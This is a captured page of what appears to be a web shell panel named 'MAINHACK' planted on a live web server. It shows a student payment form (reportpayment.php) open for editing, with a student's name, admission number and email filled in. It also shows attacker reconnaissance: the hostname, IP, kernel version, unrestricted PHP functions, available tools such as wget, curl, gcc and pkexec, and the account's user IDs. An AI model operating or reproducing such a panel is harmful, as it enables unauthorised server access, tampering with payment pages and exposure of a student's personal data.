[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: reportpayment.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Student Details</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; font-family: Arial, sans-serif; } body { background-color: #f4f4f4; display: flex; justify-content: center; align-items: center; min-height: 100vh; padding: 20px; } .container { background-color: #fff; padding: 20px; border: 2px solid #ff0000; border-radius: 5px; width: 100%; max-width: 500px; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); } h1 { text-align: center; color: #000; margin-bottom: 10px; } .cost { text-align: center; color: #666; margin-bottom: 10px; } .warning { text-align: center; color: #ff0000; margin-bottom: 20px; font-size: 0.9em; } .form-group { margin-bottom: 15px; } label { display: block; font-weight: bold; margin-bottom: 5px; } label span { font-weight: normal; font-size: 0.8em; color: #666; } input, select { width: 100%; padding: 10px; border: 1px solid #ccc; border-radius: 5px; font-size: 1em; } input[readonly] { background-color: #f0f0f0; color: #333; } .note { font-size: 0.8em; color: #ff5555; margin-top: 5px; } button { width: 100%; padding: 12px; background-color: #007bff; color: #fff; border: none; border-radius: 5px; font-size: 1em; cursor: pointer; } button:hover { background-color: #0056b3; } /* Responsive Design */ @media (max-width: 480px) { .container { padding: 15px; } h1 { font-size: 1.5em; } input, select, button { font-size: 0.9em; } .warning { font-size: 0.8em; } } </style> </head> <body> <div class="container"> <h1>Student Details</h1> <p class="cost">Cost of the Code is GHC40.00</p> <p class="warning">Please verify that all details are correct before proceeding with payment. Codes purchased in error are non-refundable.</p> <form> <div class="form-group"> <label for="fullName">Full Name</label> <input type="text" id="fullName" value="ABANKWA, KWADWO YIADOM [GENERAL SCIENCE - 1 SCIENCE 2]" readonly> </div> <div class="form-group"> <label for="email">Email Address <span>(You are strongly encouraged to provide your email address for easy access to your Access Code)</span></label> <input type="email" id="email" value="perpetualoforiabankwa@gmail.com" placeholder="Enter your email address"> <p class="note">The new Access Code will be sent to this email.</p> </div> <div class="form-group"> <label for="admissionNumber">Admission Number</label> <input type="text" id="admissionNumber" value="2401190320" readonly> </div> <div class="form-group"> <label for="phone">Phone Number <span>(In case you don't receive your Access Code via SMS promptly, we recommend checking your email)</span></label> <input type="tel" id="phone" placeholder="Enter your SMS phone number here"> <p class="note">The new Access Code will be sent to this phone number.</p> </div> <div class="form-group"> <label for="paymentChannel">Payment Channel</label> <select id="paymentChannel"> <option value="hubtel">HUBTEL</option> </select> </div> <button type="submit">Pay Now</button> </form> </div> </body> </html>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.06 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002